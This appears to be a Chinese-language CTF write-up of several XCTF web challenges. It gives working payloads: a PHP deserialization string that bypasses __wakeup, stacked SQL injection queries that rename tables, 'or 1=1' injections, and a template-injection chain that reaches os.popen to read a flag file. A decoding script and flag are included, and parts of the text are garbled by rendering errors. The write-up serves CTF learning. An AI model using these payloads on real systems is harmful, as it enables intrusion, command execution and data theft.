XCTF-web(五)

Web_php_unserialize

当通过KaTeX parse error: Expected group after '' at position 42: ...erialize,触发魔术方法_̲_wakeup和__destr...this->file)输出文件内容,若KaTeX parse error: Expected group after '' at position 17: ...ile可控,可读取任意文件。 _̲_wakeup 防御:若file不为index.php,会被重置为index.php。可通过属性个数溢出绕过(序列化时声明的属性个数大于实际个数,__wakeup不会执行)。

正则检测:preg_match('/[oc]:\d+:/i', $var)禁止包含o:或c:开头的序列化字符串。可利用NULL 字节截断让正则匹配失败(PHP 中preg_match遇到 NULL 字节会提前终止匹配)。

构造:/index.php?var=?TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

supersqli

看一下会输出什么

'1会报错

1';show databases -- #

1';show tables -- #

1';show columns from 1919810931114514 -- #

1';rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);-- #

1' or 1=1 #

inget

?id=1' or 1=1 -- #

web2

对密文进行 str_rot13 还原:由于 str_rot13 是双向变换,再次应用即可还原。

反转字符串:逆转加密时最后一步的 strrev。

Base64 解码:解开加密时的 base64_encode。

字符 ord 减 1:逆转加密时每个字符 ord+1 的操作。

再次反转字符串:逆转加密时第一步的 strrev。

csharp 复制代码
import base64
def python_decode(string):
    zimu = "abcdefghijklmnopqrstuvwxyz" 
    rot_13 ="" 
    for i in string: 
        if i.isdigit():
            rot_13 += i
        else:
            try:
                rot_13 += zimu[zimu.index(i)-13] 
            except:
                rot_13 += zimu[zimu.index(i.lower())-13].upper()
    fz = rot_13[::-1]
    base = base64.b64decode(fz)
    base = [chr(ord(i)-1) for i in base]
    fz = base[::-1]
    print "".join(fz)

python_decode("a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws")

结果:flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

Web_python_template_injection

输入/{{7+7}},测试存在模板注入

/{{''.class}}

/{{''.class .mro}}

/{{''.class .base .base .subclasses()}}

/{{''.class .base .base .subclasses()[168]}}

/{{''.class .base .base .subclasses ()[145].init .globals .builtins 'eval'}}

/{{''.class .base .base .subclasses ()[145].init .globals .builtins ['eval']('import("os").popen("cat fl4g").read()')}}

相关推荐
f0rev3r13 小时前
NewStarCTF2025-WEEK2
网络安全
缘友一世13 小时前
深入理解Shell与反弹Shell:从原理到实战
linux·网络安全·shell
Whoami!15 小时前
⸢ 捌-Ⅰ⸥⤳ 可信纵深防御应用实践:0Day漏洞 & 钓鱼攻击
网络安全·信息安全·纵深防御·案例实践
white-persist15 小时前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
北京耐用通信18 小时前
电力自动化新突破:Modbus如何变身Profinet?智能仪表连接的终极解决方案
人工智能·物联网·网络安全·自动化·信息与通信
汤愈韬19 小时前
NTFS权限基础、权限累加规则、权限继承规则
windows·网络安全
lingggggaaaa21 小时前
小迪安全v2023学习笔记(一百三十四讲)—— Windows权限提升篇&数据库篇&MySQL&MSSQL&Oracle&自动化项目
java·数据库·windows·笔记·学习·安全·网络安全
Bruce_Liuxiaowei1 天前
Win7虚拟机加入域错误排查指南:解决无法启动服务问题
运维·网络·windows·安全·网络安全
mjhcsp1 天前
博客安全攻防演练:从实战视角构建全方位防护体系
网络安全·博客
2401_865382502 天前
工信部发布→《云计算综合标准化体系建设指南(2025版)》
网络安全·云计算·信息安全技术